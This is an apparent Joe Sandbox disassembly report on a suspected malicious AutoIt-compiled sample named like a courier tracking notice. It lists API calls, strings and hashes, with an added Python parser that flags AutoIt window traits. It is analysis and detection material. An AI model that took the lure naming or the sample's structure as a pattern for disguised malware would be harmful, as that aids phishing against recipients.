                                                    • Instruction ID: b346adef4dff313a506e4c6934392222f22b77287bd63b7e65d394c318654828
                                                    • Opcode Fuzzy Hash: d898fb3aebd6c722afbcc7b9d380e64f3d112eab171bc20d89deee1431608430
                                                    • Instruction Fuzzy Hash: B2919C76408309EFD7109F64DC08A5BBBA9FF8A331F140A29FD66D61A1D734D848EB52
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00F374DE
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F3759D
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F375DB
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F375ED
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F37633
                                                    • GetClientRect.USER32(00000000,?), ref: 00F3763F
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F37683
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F37692
                                                    • GetStockObject.GDI32(00000011), ref: 00F376A2
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F376A6
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F376B6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F376BF
                                                    • DeleteDC.GDI32(00000000), ref: 00F376C8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F376F4
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F3770B
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F37746
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F3775A
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F3776B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F3779B
                                                    • GetStockObject.GDI32(00000011), ref: 00F377A6
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F377B1
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F377BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 117924e3ce760041454972b2862fcf828d9d31f26196287261f55ae7d206caf7
                                                    • Instruction ID: ee4e208fb366351705af334f243796f4e833f2ca94681c440b13924f29fca147
                                                    • Opcode Fuzzy Hash: 117924e3ce760041454972b2862fcf828d9d31f26196287261f55ae7d206caf7
                                                    • Instruction Fuzzy Hash: 95A180B5A40609BFEB14DBA4DD4AFAF7BB9EB09710F004114FA15A72E0CB70AD05DB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2AD1E
                                                    • GetDriveTypeW.KERNEL32(?,00F4FAC0,?,\\.\,00F4F910), ref: 00F2ADFB
                                                    • SetErrorMode.KERNEL32(00000000,00F4FAC0,?,\\.\,00F4F910), ref: 00F2AF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: de6f88f97389e11730f7fbca24e1cb2e535aa05c83de55d4ed00c3785362395e
                                                    • Instruction ID: 02afdc6f97a26e6f85d5344f19dd73ad83300fa3d393c6c23c2fa43694da8d79
                                                    • Opcode Fuzzy Hash: de6f88f97389e11730f7fbca24e1cb2e535aa05c83de55d4ed00c3785362395e
                                                    • Instruction Fuzzy Hash: 0D5194B2A84215EBCB10DB14EA46EBD77A1EB48750720805BE40BB7291DA79DD43FB43
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 1c5fbf14b32fb563d9561fa0c2c2589df93ff8594947de781ef93c0353448991
                                                    • Instruction ID: db7cb28b2dca08fd6023da78115ecabaf9610017751fab2a17c013541bf6cb92
                                                    • Opcode Fuzzy Hash: 1c5fbf14b32fb563d9561fa0c2c2589df93ff8594947de781ef93c0353448991
                                                    • Instruction Fuzzy Hash: 49811A716002096ACF10AE61DD47FBF3BA8EF45704F046029FD05BB192EB72EE46D651
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F49AD2
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F49B8B
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F49BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 514cd74ef75b017b74de47b18b7b9cc6d95c8b0f51bf48fe6cc1bfc650d529c7
                                                    • Instruction ID: c9939e4c40123a9950f45305a04bb00bcf0bd6e6bc89fd077c3b6955726c8226
                                                    • Opcode Fuzzy Hash: 514cd74ef75b017b74de47b18b7b9cc6d95c8b0f51bf48fe6cc1bfc650d529c7
                                                    • Instruction Fuzzy Hash: 2802DE31608201AFD725CF14C888BABBFE4FF59324F04852DFD99962A1C7B5D948EB52
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 00F4A903
                                                    • SetTextColor.GDI32(?,?), ref: 00F4A907
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F4A91D
                                                    • GetSysColor.USER32(0000000F), ref: 00F4A928
                                                    • CreateSolidBrush.GDI32(?), ref: 00F4A92D
                                                    • GetSysColor.USER32(00000011), ref: 00F4A945
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4A953
                                                    • SelectObject.GDI32(?,00000000), ref: 00F4A964
                                                    • SetBkColor.GDI32(?,00000000), ref: 00F4A96D
                                                    • SelectObject.GDI32(?,?), ref: 00F4A97A
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A999
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4A9B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4A9C5
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4A9ED
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F4AA14
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F4AA32
                                                    • DrawFocusRect.USER32(?,?), ref: 00F4AA3D
                                                    • GetSysColor.USER32(00000011), ref: 00F4AA4B
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F4AA53
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F4AA67
                                                    • SelectObject.GDI32(?,00F4A5FA), ref: 00F4AA7E
                                                    • DeleteObject.GDI32(?), ref: 00F4AA89
                                                    • SelectObject.GDI32(?,?), ref: 00F4AA8F
                                                    • DeleteObject.GDI32(?), ref: 00F4AA94
                                                    • SetTextColor.GDI32(?,?), ref: 00F4AA9A
                                                    • SetBkColor.GDI32(?,?), ref: 00F4AAA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 7a01d8ca96b3cbafcfe9571e0625ec7d1fad0b58d716cc057081bc4688085e44
                                                    • Instruction ID: caeca86ede2254d6a2064275d6bb8be35a8396a86d1349381bc3307482cbc1d7
                                                    • Opcode Fuzzy Hash: 7a01d8ca96b3cbafcfe9571e0625ec7d1fad0b58d716cc057081bc4688085e44
                                                    • Instruction Fuzzy Hash: 5E514A76900208FFDB109FA4DC48EAEBBB9EF49320F114225FD15AB2A1D7759944EF90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F48AC1
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F48AD2
                                                    • CharNextW.USER32(0000014E), ref: 00F48B01
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F48B42
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F48B58
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F48B69
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F48B86
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F48BD8
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F48BEE
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F48C1F
                                                    • _memset.LIBCMT ref: 00F48C44
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F48C8D
                                                    • _memset.LIBCMT ref: 00F48CEC
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F48D16
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F48D6E
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F48E1B
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F48E3D
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F48E87
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F48EB4
                                                    • DrawMenuBar.USER32(?), ref: 00F48EC3
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F48EEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 83c7bbf7b32cc40f66ac82420aa528daac3ce60a4cb8ddba5fd6f094a90a8241
                                                    • Instruction ID: b69d9f1fab957a4e8e7ad67e38d562f46664a0aecb350023227b83b6b4d771a0
                                                    • Opcode Fuzzy Hash: 83c7bbf7b32cc40f66ac82420aa528daac3ce60a4cb8ddba5fd6f094a90a8241
                                                    • Instruction Fuzzy Hash: 78E18375901209AFDF209F50CC84EEE7FB9EF067A0F108156FE19AA190DB749985EF60
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00F449CA
                                                    • GetDesktopWindow.USER32 ref: 00F449DF
                                                    • GetWindowRect.USER32(00000000), ref: 00F449E6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F44A48
                                                    • DestroyWindow.USER32(?), ref: 00F44A74
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F44A9D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F44ABB
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F44AE1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F44AF6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F44B09
                                                    • IsWindowVisible.USER32(?), ref: 00F44B29
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F44B44
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F44B58
                                                    • GetWindowRect.USER32(?,?), ref: 00F44B70
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F44B96
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F44BB0
                                                    • CopyRect.USER32(?,?), ref: 00F44BC7
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F44C32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: daaf030d629a9f8d6e3b4a0b19750f974e3617ef45dc750fb2a79b3845d3aaef
                                                    • Instruction ID: 181dab2ba034859f8dd8e5192a529d947ab9d1a56a6fea6f44837a39a432387c
                                                    • Opcode Fuzzy Hash: daaf030d629a9f8d6e3b4a0b19750f974e3617ef45dc750fb2a79b3845d3aaef
                                                    • Instruction Fuzzy Hash: A7B18C71604340AFDB04DF64C988B6ABBE4FF89710F00891CF999AB2A1DB75EC05DB55
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F244AC
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F244D2
                                                    • _wcscpy.LIBCMT ref: 00F24500
                                                    • _wcscmp.LIBCMT ref: 00F2450B
                                                    • _wcscat.LIBCMT ref: 00F24521
                                                    • _wcsstr.LIBCMT ref: 00F2452C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F24548
                                                    • _wcscat.LIBCMT ref: 00F24591
                                                    • _wcscat.LIBCMT ref: 00F24598
                                                    • _wcsncpy.LIBCMT ref: 00F245C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: fa1222399727b4da7e77874cc52793f5f06fecdbb2077d645f70dad6983b161f
                                                    • Instruction ID: a23cced8229fc83965a460bb1aa72670f140706201fcc7617db9620554152883
                                                    • Opcode Fuzzy Hash: fa1222399727b4da7e77874cc52793f5f06fecdbb2077d645f70dad6983b161f
                                                    • Instruction Fuzzy Hash: 8741F9329402587BDB10AB759C07FBF7BECDF41710F04006AFA05F6182EA75E901A6A6
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EC28BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 00EC28C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EC28EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 00EC28F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 00EC291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EC2939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EC2949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EC297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EC2990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00EC29AE
                                                    • GetStockObject.GDI32(00000011), ref: 00EC29CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC29D5
                                                      • Part of subcall function 00EC2344: GetCursorPos.USER32(?), ref: 00EC2357
                                                      • Part of subcall function 00EC2344: ScreenToClient.USER32(00F857B0,?), ref: 00EC2374
                                                      • Part of subcall function 00EC2344: GetAsyncKeyState.USER32(00000001), ref: 00EC2399
                                                      • Part of subcall function 00EC2344: GetAsyncKeyState.USER32(00000002), ref: 00EC23A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00EC1256), ref: 00EC29FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 3eef37739d99e755cd71dff1180434bb2d19f66d265fd6aef343e679c6504b65
                                                    • Instruction ID: 672a2783cc6578d190e4f2cd8beb4f2fc0b8cc7e435ab2ec267bcaca11032fdd
                                                    • Opcode Fuzzy Hash: 3eef37739d99e755cd71dff1180434bb2d19f66d265fd6aef343e679c6504b65
                                                    • Instruction Fuzzy Hash: 26B17B75A0020EEFDB14DFA8CD45FEE7BB4FB08714F205229FA15A62A0DB749851DB50
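The routine listed above is the one that creates the sample's top-level window with the class name "AutoIt v3 GUI", the class the AutoIt runtime registers for its GUI, which is consistent with the binary being a compiled AutoIt script; the surrounding routines drive standard controls (combobox, list-view, tab and tooltip messages) through SendMessageW. Each trace line follows the Joe Sandbox format `• API.MODULE(args), ref: address`, with `?` for arguments the sandbox could not resolve and a `Part of subcall function X:` prefix for calls made inside a callee. The following is an added example, not part of this report and not Joe Sandbox's own tooling: a Python parser for these lines that decodes the SendMessageW message IDs to their Win32 names (public winuser.h / commctrl.h values) and flags the "AutoIt v3 GUI" window class. The sample input is constructed from lines copied out of this listing, and the function names (`parse_trace`, `decode_message`, `autoit_indicators`, `module_histogram`) are my own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: API-trace lines copied from this report's listing,
# in the Joe Sandbox format "• API.MODULE(args), ref: address".
SAMPLE_TRACE = """\
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EC297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EC2990
• GetStockObject.GDI32(00000011), ref: 00EC29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC29D5
  • Part of subcall function 00EC2344: GetAsyncKeyState.USER32(00000001), ref: 00EC2399
• SetTimer.USER32(00000000,00000000,00000028,00EC1256), ref: 00EC29FC
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F48B58
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F48D16
• _memset.LIBCMT ref: 00F48C44
"""

# One trace line; "Part of subcall function X:" marks a call made inside a callee.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 message IDs that appear in this listing (public winuser.h / commctrl.h values).
WM_USER, LVM_FIRST, TCM_FIRST = 0x0400, 0x1000, 0x1300
MESSAGE_NAMES: Dict[int, str] = {
    0x000E: "WM_GETTEXTLENGTH", 0x0030: "WM_SETFONT",
    0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
    0x014B: "CB_RESETCONTENT", 0x014E: "CB_SETCURSEL", 0x0158: "CB_FINDSTRINGEXACT",
    WM_USER + 17: "TTM_TRACKACTIVATE", WM_USER + 18: "TTM_TRACKPOSITION",
    WM_USER + 29: "TTM_UPDATE", WM_USER + 33: "TTM_SETTITLEW",
    WM_USER + 50: "TTM_ADDTOOLW", WM_USER + 57: "TTM_UPDATETIPTEXTW",
    LVM_FIRST + 2: "LVM_GETIMAGELIST", LVM_FIRST + 50: "LVM_GETSELECTEDCOUNT",
    LVM_FIRST + 83: "LVM_FINDITEMW", LVM_FIRST + 96: "LVM_SETCOLUMNW",
    LVM_FIRST + 116: "LVM_SETITEMTEXTW", TCM_FIRST + 61: "TCM_SETITEMW",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]              # raw tokens; "?" means the sandbox could not resolve the value
    ref: int                     # address of the call site
    subcall_of: Optional[int] = None


def parse_trace(text: str) -> List[ApiCall]:
    """Parse trace lines into ApiCall records; headers and other non-call lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the uMsg of a SendMessageW call; None for other APIs or an unresolved ("?") uMsg."""
    if call.api != "SendMessageW" or len(call.args) < 2:
        return None
    try:
        msg = int(call.args[1], 16)
    except ValueError:
        return None
    return MESSAGE_NAMES.get(msg, f"0x{msg:04X}")


def autoit_indicators(calls: List[ApiCall]) -> List[str]:
    """Flag creation of the window class the AutoIt runtime registers for its GUI."""
    hits = []
    for c in calls:
        # CreateWindowExW(dwExStyle, lpClassName, ...): the class name is argument 1
        if c.api == "CreateWindowExW" and len(c.args) > 1 and c.args[1] == "AutoIt v3 GUI":
            hits.append(f"AutoIt GUI window class created at {c.ref:08X}")
    return hits


def module_histogram(calls: List[ApiCall]) -> Dict[str, int]:
    """Count calls per imported module, a quick view of what a routine touches."""
    hist: Dict[str, int] = {}
    for c in calls:
        hist[c.module] = hist.get(c.module, 0) + 1
    return hist


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for c in parsed:
        name = decode_message(c)
        print(f"{c.ref:08X} {c.api}.{c.module}" + (f" -> {name}" if name else ""))
    print(module_histogram(parsed), autoit_indicators(parsed))
```

Feed it the full "APIs" listing of any function block from this report to get a readable summary of what that routine does with the GUI; messages not in the table are printed as their hex ID so nothing is silently dropped.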
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F43E6F
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F43F2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
